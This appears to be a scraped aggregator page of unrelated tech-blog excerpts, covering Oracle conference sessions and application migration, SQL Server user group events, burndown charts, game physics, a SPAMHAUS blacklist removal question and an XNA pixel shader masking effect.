    As is customary, the Oracle ACEs have invaded the Oracle Develop Conference agenda.Why? Because Oracle ACE-dom inherently is a stamp of not only expertise, but a unique ability to make that expertise useful to others. Plus, they're a group of "fine blokes" (UK. subjects, educate me: is that really a word?)Perhaps if you're not able to catch one of these sessions, you will be able to see the applicable ACE in action elsewhere, at a conference or user group meeting near you. Session ID Session Title Speaker, Company S313355 Developing Large Oracle Application Development Framework 11g Applications Andrejus Baranovskis, Red Samurai Consulting S316641 Xenogenetics for PL/SQL: Infusing with Java Best Practices and Design Patterns Lucas Jellema, AMIS; Alex Nuijten, AMIS S317171 Building Secure Multimedia Web Applications: Tips and Techniques Marcel Kratochvil, Piction; Melliyal Annamalai, Oracle S315660 Database Applications Lifecycle Management Marcelo Ochoa, Facultad de Ciencias Exactas S315689 Building a High-Performance, Low-Bandwidth Web Architecture Paul Dorsey, Dulcian, Inc. S316003 Managing the Earthquake: Surviving Major Database Architecture Changes Paul Dorsey, Dulcian, Inc.; Michael Rosenblum, Dulcian, Inc. S314869 Introduction to Java: PL/SQL Developers Take Heart Peter Koletzke, Quovera S316184 Deploying Applications to Oracle WebLogic Server Using Oracle JDeveloper Peter Koletzke, Quovera; Duncan Mills, Oracle S316597 Using Collections in Oracle Application Express: The Definitive Intro Raj Mattamal, Niantic Systems, LLC S313382 Using Oracle Database 11g Release 2 in an Oracle Application Express Environment Roel Hartman, Logica S313757 Debugging with Oracle Application Express and Oracle SQL Developer Dimitri Gielis, Sumneva S313759 Using Oracle Application Express in Big Projects with Many Developers Dimitri Gielis, Sumneva S313982 Forms2Future: The Ongoing Journey into the Future for Oracle-Based Organizations Lucas Jellema, AMIS; Peter Ebell, AMIS

    Read the article

  • A Primer on Migrating Oracle Applications to a New Platform

    - by Nick Quarmby
    In Support we field a lot of questions about the migration of Oracle Applications to different platforms.  This article describes the techniques available for migrating an Oracle Applications environment to a new platform and discusses some of the common questions that arise during migration.  This subject has been frequently discussed in previous blog articles but there still seems to be a gap regarding the type of questions we are frequently asked in Service Requests. Some of the questions we see are quite abstract. Customers simply want to get a grip on understanding how they approach a migration. Others want to know if a particular architecture is viable. Other customers ask about mixing different platforms within a single Oracle Applications environment.    Just to clarify, throughout this article, the term 'platform' refers specifically to operating systems and not to the underlying hardware. For a clear definition of 'platform' in the context of Oracle Applications Support then Terri's very timely article:Oracle E-Business Suite Platform SmörgåsbordThe migration process is very similar for both 11i and R12 so this article only mentions specific differences where relevant.

    Read the article

  • Oracle E-Business Suite (WebADI) integration with Oracle Open Office

    - by Harald Behnke
    Another highlight of the new Oracle Open Office Release 3.3 enterprise features is the Oracle E-Business Suite Release 12.1 (WebADI) integration. The WebADI integration in Oracle Open Office for Windows allows you to bring your Oracle E-Business Suite data into an Oracle Open Office Calc spreadsheet, where familiar data entry and modeling techniques can be used to complete your E-Business Suite tasks. You can create formatted spreadsheets on your desktop that allow you to download, view, edit, and create Oracle E-Business Suite data. Use data entry shortcuts (such as copying and pasting or dragging and dropping ranges of cells), or Calc's Open Document Format (ODF V1.2) compliant spreadsheet formulas, to calculate amounts to save time. You can combine speed and accuracy by invoking lists of values for fields within the spreadsheet. After editing the spreadsheet, you can use WebADI's validation functionality to validate the data before uploading it to the Oracle E-Business Suite. Validation messages are returned to the spreadsheet, allowing you to identify and correct invalid. This video shows a hands-on demonstration of the Oracle E-Business Suite integration: Read more about the Oracle Open Office enterprise features.

    Read the article

  • SQL User Group Events coming - Cambridge, Leeds, Manchester and Edinburgh

    - by tonyrogerson
    Neil Hambly and myself are presenting next week in Cambridge, Neil will be showing us how to use tools at hand to determine the current activity on your database servers and I'll be doing a talk around Disaster Recovery and High Availability and the options we have at hand.The User Group is growing in size and spread, there is a Southampton event planned for the 9th Dec - make sure you keep your eyes peeled for more details - the best place is the UK SQL Server User Group LinkedIn area.Want removing from this email list? Then just reply with remove please on the subject line.Cambridge SQL UG - 25th Nov, EveningEvening Meeting, More info and registerNeil Hambly on Determining the current activity of your Database Servers, Product demo from Red-Gate, Tony Rogerson on HA/DR/Scalability(Backup/Recovery options - clustering, mirroring, log shipping; scaling considerations etc.)Leeds SQL UG - 8th Dec, EveningEvening Meeting, More info and registerNeil Hambly will be talking about Index Views and Computed Columns for Performance, Tony Rogerson will be showing some advanced T-SQL techniques.Manchester SQL UG - 9th Dec, EveningEvening Meeting, More info and registerEnd of year wrap up, networking, drinks, some discussions - more info to follow soon.Edinburgh SQL UG - 9th Dec, EveningEvening Meeting, More info and registerSatya Jayanty will give an X factor for a DBAs life and Tony Rogerson will talk about SQL Server internals.Many thanks,Tony Rogerson, SQL Server MVPUK SQL Server User Grouphttp://sqlserverfaq.com

    Read the article

  • What, if anything, to do about bow-shaped burndowns?

    - by Karl Bielefeldt
    I've started to notice a recurring pattern to our team's burndown charts, which I call a "bowstring" pattern. The ideal line is the "string" and the actual line starts out relatively flat, then curves down to meet the target like a bow. My theory on why they look like this is that toward the beginning of the story, we are doing a lot of debugging or exploratory work that is difficult to estimate remaining work for. Sometimes it even goes up a little as we discover a task is more difficult once we get into it. Then we get into implementation and test which is more predictable, hence the curving down graph. Note I'm not talking about a big scale like BDUF, just the natural short-term constraint that you have to find the bug before you can fix it, coupled with the fact that stories are most likely to start toward the beginning of a two-week iteration. Is this a common occurrence among scrum teams? Do people see it as a problem? If so, what is the root cause and some techniques to deal with it?

    Read the article

  • Game physics presentation by Richard Lord, some questions

    - by Steve
    I been implementing (in XNA) the examples in this physics presentation by Richard Lord where he discusses various integration techniques. Bearing in mind that I am a newcomer to game physics (and physics in general) I have some questions. 15 slides in he shows ActionScript code for a gravity example and an animation showing a bouncing ball. The ball bounces higher and higher until it is out of control. I implemented the same in C# XNA but my ball appeared to be bouncing at a constant height. The same applies to the next example where the ball bounces lower and lower. After some experimentation I found that if I switched to a fixed timestep and then on the first iteration of Update() I set the time variable to be equal to elapsed milliseconds (16.6667) I would see the same behaviour. Doing this essentially set the framerate, velocity and acceleration to zero for the first update and introduced errors(?) into the algorithm causing the ball's velocity to increase (or decrease) over time. I think! My question is, does this make the integration method used poor? Or is it demonstrating that it is poor when used with variable timestep because you can't pass in a valid value for the first lot of calculations? (because you cannot know the framerate in advance). I will continue my research into physics but can anyone suggest a good method to get my feet wet? I would like to experiment with variable timestep, acceleration that changes over time and probably friction. Would the Time Corrected Verlet be OK for this?

    Read the article

  • Bruce Lee Software development.

    - by DesigningCode
    "Styles tend to not only separate men - because they have their own doctrines and then the doctrine became the gospel truth that you cannot change. But if you do not have a style, if you just say: Well, here I am as a human being, how can I express myself totally and completely? Now, that way you won't create a style, because style is a crystallization. That way, it's a process of continuing growth."- Bruce Lee This is kind of how I see software development. What I enjoyed in the the early days of Agile, things seemed very dynamic, people were working out all manner of ways of doing things. It was technique oriented, it was very fluid and people were finding all kinds of good ways of doing things.  Now when I look at the world of “Agile” it seems more crystalized.  In fact that seemed to be a goal, to crystalize the goodness so everyone can share.   I think mainly because it seems a heck of a lot easier to market.  People are more willing to accept a well defined doctrine and drink the Kool Aid.   Its more “corporate” or “professional”. But the process of crystalizing the goodness actually makes it bad.   But luckily in the world of software development there are still many people who are more focused on “how can I express myself totally and completely”.   We are seeing expressive languages, expressive frameworks, tooling that helps you to better express yourself, design techniques that allow you to better express your intent.    I love that stuff! So beware, be very cautious of anyone offering you new age wisdom based on crystals!

    Read the article

  • Upcoming Webcast: Use Visual Decision Making To Boost the Pace of Product Innovation – October 24, 2013

    - by Gerald Fauteux
    See More, Do More Use Visual Decision Making To Boost the Pace of Product Innovation   Join a Free Webcast hosted by Oracle, featuring QUALCOMM Click here to register for this webcast   Keeping innovation ahead of shrinking product lifecycles continues to be a challenge in today’s fast-paced business environment, but new visualization techniques in the product design and development process are helping businesses widen the gap further.  Innovative visualization methods, including Augmented Business Visualization, can be powerful differentiators for business leaders, especially when it comes to accelerating product cycles.   Don’t miss this opportunity to discover how visualization tied to PLM can help empower visual decision making and enhance productivity across your organization.  See more and do more with the power of Oracle. Join solution experts from Oracle and special guest, Ravi Sankaran, Sr. Staff Systems Analyst, QUALCOMM to discuss how visual decision making can help efficiently ramp innovation efforts throughout the product lifecycle: Advance collaboration with universal access across all document types with robust security measures in place Synthesize product information quickly like cost, quality, compliance, etc. in a highly visual form from multiple sources in a single visual and actionable environment Increase productivity by rendering documents in the appropriate context of specific business processes Drive modern business transformation with new collaboration methods such as Augmented Business Visualization . Date: Thursday, October 24, 2013 Time: 10:00 a.m. PDT / 1:00 p.m. EDT Click here to register for this FREE event

    Read the article

  • How to get ip-address out of SPAMHAUS blacklist?

    - by ???????? ????? ???????????
    I frequently read that it is possible to remove individual ip-addresses from SPAMHAUS blacklisting. OK. Here is 91.205.43.252 (91.205.43.251 - 91.205.43.253) used by back3.stopspamers.com (back2.stopspamers.com, back1.stopspamers.com) in geo-cluster on dedicated servers in Switzerland. The queries: http://www.spamhaus.org/query/bl?ip=91.205.43.251 http://www.spamhaus.org/query/bl?ip=91.205.43.252 http://www.spamhaus.org/query/bl?ip=91.205.43.253 tell that: 91.205.43.251 - 91.205.43.253 are all listed in the SBL80808 blacklist And SBL80808 blacklist tells: "Ref: SBL80808 91.205.40.0/22 is listed on the Spamhaus Block List (SBL) 01-Apr-2010 05:52 GMT | SR04 Spamming and now seems this place is involved in other fraud" 91.205.43.251-91.205.43.253 are not listed amongst criminal ip-addresses individually but there is no way to remove it individually from black listing. How to remove this individual (91.205.43.251-91.205.43.253) addresses from SPAMHAUS blacklist? And why the heck SPAMHAUS is blacklisting spam-stopping service? This is only one example of a bunch. My related posts: Blacklist IP database Update: From the answer provided I realized that my question was not even understood. This ip-addresses 91.205.43.251 - 91.205.43.253 are not blacklisted individually, they are blacklisted through its supernet 91.205.40.0/22. Also note that dedicated server, ISP and customer are in much different distant countries. Update2: http://www.spamhaus.org/sbl/sbl.lasso?query=SBL80808#removal tells: "To have record SBL80808 (91.205.40.0/22) removed from the SBL, the Abuse/Security representative of RIPE (or the Internet Service Provider responsible for supplying connectivity to 91.205.40.0/22) needs to contact the SBL Team" There are dozens of "abusers" in that blacklist SBL80808. The company using that dedicated server is not an ISP or RIPE representative to treat these issues. Even if to treat it, it is just a matter of pressing "Report spam" on internet to be again blacklisted, this is fruitless approach. These techniques are broadly used by criminals and spammers, See also this my post on blacklisting. This is just one specific example but there are many-many more.

    Read the article

  • Visual Studio Talk Show #116 is now online - Les nouveautés de la conférence MIX 2010 (French)

    - by guybarrette
    http://www.visualstudiotalkshow.com Laurent Duveau: Les nouveautés de la conférence MIX 2010 Nous discutons avec Laurent Duveau des nouveautés annoncées dans le cadre de la conférence MIX 2010 à laquelle Laurent a assisté. MIX est une conférence tenue annuellement pour les développeurs et les designers Web qui présente les dernières nouveautés produites par Microsoft pour la programmation Internet. Laurent Duveau est un consultant et formateur pour la firme RunAtServer Consulting. Il se spécialise dans un domaine qu'il adore: les applications web avec Silverlight et l'outillage Microsoft Expression. Laurent est certifié MCSD.NET, MCTS, MCPD et MCT. Il participe fréquemment aux activités de la Communauté .NET de Montréal. Il est également l'auteur d'articles techniques pour TechHeadBrothers et asp.net et contribue activement aux forums asp.net. Pour la quatrième année consécutive, il a obtenu de Microsoft le titre de MVP. Et cette année, il est parmi les premiers récipiendaire de la reconnaissance MVP Silverlight. Suivez son blog ou il écrit sur les nouveautés de Silverlight. Télécharger l'émission Si vous désirez un accès direct au fichier audio en format MP3, nous vous invitons à télécharger le fichier en utilisant un des boutons ci-dessous. Si vous désirez utiliser le feed RSS pour télécharger l'émission, nous vous invitons à vous abonnez en utilisant le bouton ci-dessous. Si vous désirez utiliser le répertoire iTunes Podcast pour télécharger l'émission, nous vous encourageons à vous abonnez en utilisant le bouton ci-dessous. var addthis_pub="guybarrette";

    Read the article

  • Why i can not load a simple pixel shader effect (. fx) file in xna?

    - by Mehdi Bugnard
    I just want to load a simple *.fx file into my project to make a (pixel shader) effect. But whenever I try to compile my project, I get the following error in visual studio Error List: Errors compiling .. ID3DXEffectCompiler: There were no techniques ID3DXEffectCompiler: Compilation failed I already searched on google and found many people with the same problem. And I realized that it was a problem of encoding. With the return lines unrecognized '\ n' . I tried to copy and paste to notepad and save as with ASCII or UTF8 encoding. But the result is always the same. Do you have an idea please ? Thanks a looot :-) Here is my [.fx] file : sampler BaseTexture : register(s0); sampler MaskTexture : register(s1) { addressU = Clamp; addressV = Clamp; }; //All of these variables are pixel values //Feel free to replace with float2 variables float MaskLocationX; float MaskLocationY; float MaskWidth; float MaskHeight; float BaseTextureLocationX; //This is where your texture is to be drawn float BaseTextureLocationY; //texCoord is different, it is the current pixel float BaseTextureWidth; float BaseTextureHeight; float4 main(float2 texCoord : TEXCOORD0) : COLOR0 { //We need to calculate where in terms of percentage to sample from the MaskTexture float maskPixelX = texCoord.x * BaseTextureWidth + BaseTextureLocationX; float maskPixelY = texCoord.y * BaseTextureHeight + BaseTextureLocationY; float2 maskCoord = float2((maskPixelX - MaskLocationX) / MaskWidth, (maskPixelY - MaskLocationY) / MaskHeight); float4 bitMask = tex2D(MaskTexture, maskCoord); float4 tex = tex2D(BaseTexture, texCoord); //It is a good idea to avoid conditional statements in a pixel shader if you can use math instead. return tex * (bitMask.a); //Alternate calculation to invert the mask, you could make this a parameter too if you wanted //return tex * (1.0 - bitMask.a); }

    Read the article

< Previous Page | 48 49 50 51 52 53 54 55 56 57 58 59  | Next Page >